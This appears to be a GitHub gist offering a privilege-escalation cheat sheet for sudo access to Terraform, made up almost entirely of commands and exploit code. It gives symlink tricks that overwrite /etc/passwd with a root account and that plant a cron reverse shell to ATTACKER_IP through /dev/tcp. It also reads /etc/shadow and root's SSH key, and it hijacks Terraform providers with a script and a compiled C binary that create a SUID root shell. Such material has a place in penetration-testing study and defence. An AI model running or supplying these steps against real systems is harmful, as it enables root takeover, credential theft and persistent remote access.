Skip to content

Instantly share code, notes, and snippets.

@strikoder
Last active January 11, 2026 16:10
Show Gist options
  • Select an option

  • Save strikoder/13843b6b7943a19bcd989de57f8a6880 to your computer and use it in GitHub Desktop.

Select an option

Save strikoder/13843b6b7943a19bcd989de57f8a6880 to your computer and use it in GitHub Desktop.
Privilege escalation using sudo on Terraform through various methods

Terraform Sudo Privilege Escalation

Method 1: File Overwrite via Symlink Attack

Option A: /etc/passwd (Add root user)

# Generate MD5 password hash
openssl passwd -1 abcd1234
# Example output: $1$xyz$abc123...

# Create malicious passwd file
mkdir -p /tmp/root/examples
cat /etc/passwd > /tmp/root/examples/passwd
echo 'strikoder:$1$xyz$abc123...:0:0:root:/root:/bin/bash' >> /tmp/root/examples/passwd

# Create symlink in Terraform's output directory (e.g., docker/public)
ln -s /etc/passwd /home/jeremy/docker/previous/public/examples/passwd #terraform destination path

# Trigger with sudo terraform - it copies from /tmp/root/examples/passwd to the symlink
TF_VAR_source_path=/tmp/root/examples/passwd sudo /usr/bin/terraform -chdir=/opt/examples apply

# After execution: su strikoder

Option B: /etc/crontab (Persistent backdoor)

# Craft malicious crontab

cat /etc/crontab > /tmp/root/examples/crontab
echo '* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' >> /tmp/root/examples/crontab

# Create symlink
ln -s /etc/crontab /home/jeremy/docker/previous/public/examples/crontab #destination path

# Trigger with terraform - reverse shell every minute
TF_VAR_source_path=/tmp/root/examples/passwd sudo /usr/bin/terraform -chdir=/opt/examples apply

Method 2: Reading Sensitive Files

Read files normally restricted to root (SSH keys, shadow file, etc.)

mkdir -p /tmp/root/examples

# Symlink to target file
ln -s /root/.ssh/id_rsa /tmp/root/examples/key # or ln -s /etc/shadow /tmp/root/examples/shadow

# Configure Terraform to read the symlinked file
TF_VAR_source_path=/tmp/root/examples/key sudo terraform apply

cat output_file_in_destination_path  # check destination_path

Method 3: Malicious Provider Binary

Hijack Terraform's provider mechanism to execute arbitrary code as root.

# Create malicious provider
cat > terraform-provider-example << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootshell
chmod +s /tmp/rootshell
EOF

chmod +x terraform-provider-example

# Option A: Via .terraformrc configuration
mkdir -p ~/.terraform.d/plugins
mv terraform-provider-example ~/.terraform.d/plugins/
cat > ~/.terraformrc << 'EOF'
provider_installation {
  filesystem_mirror {
    path    = "/home/USER/.terraform.d/plugins"
  }
}
EOF

# Option B: Via environment variable
export TF_CLI_CONFIG_FILE="/path/to/malicious/config"

# Trigger execution
sudo terraform init
sudo terraform apply

# Execute SUID shell
/tmp/rootshell -p

Method 4: Malicious Provider Template (Compiled)

More sophisticated provider hijacking using compiled binary.

// exploit.c
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("cp /bin/bash /tmp/rootbash");
    system("chmod +s /tmp/rootbash");
    return 0;
}
# Compile as fake provider
gcc exploit.c -o terraform-provider-example
chmod +x terraform-provider-example

# Place in provider directory
mkdir -p /tmp/malicious-plugins
mv terraform-provider-example /tmp/malicious-plugins/

# Execute with terraform
sudo /usr/bin/terraform -chdir=/opt/examples init
sudo /usr/bin/terraform -chdir=/opt/examples apply

# Use SUID shell
/tmp/rootbash -p
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment